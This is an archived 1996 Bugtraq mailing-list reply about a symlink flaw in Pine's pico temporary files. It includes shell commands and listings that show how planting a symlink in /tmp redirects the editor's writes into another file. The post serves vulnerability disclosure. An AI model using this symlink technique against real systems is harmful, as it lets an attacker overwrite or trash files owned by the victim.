[3343] in bugtraq

home help back first fref pref prev next nref lref last post

Re: [linux-security] Pine security problem

daemon@ATHENA.MIT.EDU (Ranaur, the Elven Warlock!)
Thu Sep 12 22:13:12 1996

Date: 	Thu, 12 Sep 1996 22:09:59 -0300
Reply-To: ranaur@usa.net
From: "Ranaur, the Elven Warlock!" <ranaur@rdc.puc-rio.br>
X-To:         "Pascal A. Dupuis" <dupuis@lei.ucl.ac.be>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To:  <Pine.LNX.3.95.960912093015.143I-100000@pc-dupuis.lei.ucl.ac.be>

On Thu, 12 Sep 1996, Pascal A. Dupuis wrote:

> I tried with my system, running Pine3.95 on Linux 2.0.18.
> A) I started composing a message, invoqued the alternate editor (with
> Linux and a french keyboard, the command is ^), ??? ). From another login
> name, I do :
>   cd /tmp
>   ln -s pico.pid hacker.tmp
>   more hacker.tmp -> permission denied !
> B) I started the other way :
>   first, from the other login
>   ln -s hacker.tmp pico.pid
> Then, start composing a message. Invoquing the alternate command resulted
> in the error message : "Problem creating pico temp file", and I was unabl=
e
> to use the alternate editor.
> On the Linux system, the /tmp/pico.pid file is created 600, owned by the
> Pine user. At first glance, this should be safe, isn't it ?
>=20
=09No.

=09I run it on  PINE 3.91 ... see on ... (sorry, I runned it as root ;)

root@galadriel:/tmp# ln -s t pico.238
root@galadriel:/tmp# touch t=20
root@galadriel:/tmp# chown 666 t
root@galadriel:/tmp# ls -l
lrwxrwxrwx   1 root     root            1 Sep 12 22:00 pico.238 -> t*
-rw-rw-rw-   1 root     root            0 Sep 12 22:01 t*
=09(runned pine (with ranaur) ... answering this message and ^_ to=20
it ... ;)

=09so ... abracadabra ...

-rw-rw-rw-   1 root     root         2366 Sep 12 22:06 t

=09Well ... it's a problem ... if the evil guy is smart enough he=20
can check the root running pine and trash a file in the system ... (the=20
odds are few, but , let me be paranoid ;) )

=09Any sugestions?

    Ainur =89a Valar!
        Ranaur

         . . . . . . . . . . . . . . . . . . . . . . . . . .
            . . . . . . Ranaur, the Elven Warlock ! . . . . . .
               . . E-mail ranaur@rdc.puc-rio.br ranaur@usa.net . .
            . . Look! . http://venus.rdc.puc-rio.br/ranaur/ . .
         . . . . . . . . . . . . . . . . . . . . . . . . . .
home help back first fref pref prev next nref lref last post